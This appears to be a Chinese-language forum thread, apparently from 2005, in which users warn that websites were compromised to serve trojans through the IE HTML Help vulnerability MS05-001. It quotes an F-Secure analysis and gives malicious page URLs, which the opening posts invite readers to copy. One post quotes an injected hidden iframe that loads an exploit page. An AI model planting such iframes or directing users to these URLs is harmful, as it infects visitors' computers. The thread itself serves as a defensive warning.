真正的位置在這邊....
請自行複製點選連結
"http://4764467445.b108.zgsj.com/count.htm"
真正的位置在這邊....
請自行複製點選連結
"http://4764467445.b108.zgsj.com/count.htm"
用 FireFox 不需要擔心啦。
用戶端的應該是利用這個漏洞的。
http://www.microsoft.com/taiwan/secu.../MS05-001.mspx
Microsoft 安全性公告 MS05-001
HTML Help 說明檔的弱點可能會允許程式碼執行 (890175)
記得去修補 IE 漏洞。
另外,好心一點的就寫 email 去告訴它們網站客服人員,或去留言版留個言提醒一下吧。
最近已經碰過不少的 MS IIS + ASP 站台都中毒中木馬到不知不覺了。
PS: 用 FireFox 的,你會在頁面左上角看到一個奇怪的符號跟數字 1 之類的。那個就是隱藏的病毒網頁 count.htm 執行後的結果。用IE的看不到。
KB890175就算是有安裝了SP2也是要更新喔!
我也是在tcr這網站中木馬的大家千萬不要去
好像沒有。我是不是中毒了啊。作者:yuping
F-Secure Corporation 的回答
==================================
Thanks for your report. We have checked the website and found a CHM
file that
drops a trojan downloader. This trojan downloader hiddenly downloads
and run
another executable file which is detected as follows:
--------------------------------------------------------------
Scanning Report
10 February 2005 15:50:02 - 15:50:09
Target: C:\1
Result: 1 virus found
* C:\1\setup.ex Infection: Trojan-PSW.Win32.Lineage.ah Action:
Renamed.
--------------------------------------------------------------
We will file the abuse report about the download site and add detection
for
the trojan downloader.
Regards,
http://www.papago.com.tw/
這個網站似乎也被植入木馬
進去討論區KAV就跳出了
-----
原始碼怎麼看不到它插入的CSS?
沒錯!http://www.mactiontech.com/big5/board/board.asp作者:darren2000
程式碼<iframe width=0 height=0 src=http://www.szadk.com/new.htm></iframe>
kav偵測為 new.htm - infected by Exploit.VBS.Phel.c
書籤